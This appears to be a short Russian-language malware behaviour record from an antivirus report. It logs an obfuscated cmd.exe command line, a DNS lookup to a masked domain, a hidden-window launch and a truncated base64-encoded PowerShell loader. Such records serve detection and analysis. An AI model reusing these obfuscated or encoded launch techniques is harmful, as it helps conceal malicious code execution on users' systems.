Техническая информация
- '<SYSTEM32>\cmd.exe' rKZJWzApbtIiLo fiGjIimpFRNtpGCTLTSYq DXiAbvHvRwrq & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %CPKQQFVTswmGAVr%=WrVBpCDJiiLtz&&set %KrhDnXn%=p&&set %GNKZJYi%=o...
- DNS ASK qw###dqwd19.com
- '<SYSTEM32>\cmd.exe' rKZJWzApbtIiLo fiGjIimpFRNtpGCTLTSYq DXiAbvHvRwrq & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %CPKQQFVTswmGAVr%=WrVBpCDJiiLtz&&set %KrhDnXn%=p&&set %GNKZJYi%=o...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e KAAgAG4AZQBXAC0AbwBCAEoAZQBDAFQAIAAgAHMAWQBzAFQARQBtAC4AaQBPAC4AQwBvAE0AcABSAEUAcwBTAEkAbwBOAC4AZABFAGYAbABBAFQAZQBzAFQAcgBlAEEAbQAoACAAWwBJAE8ALgBNAGUAbQBvAHIAeQBzAFQAUgBFAGEATQBdAFsAcwB5AF...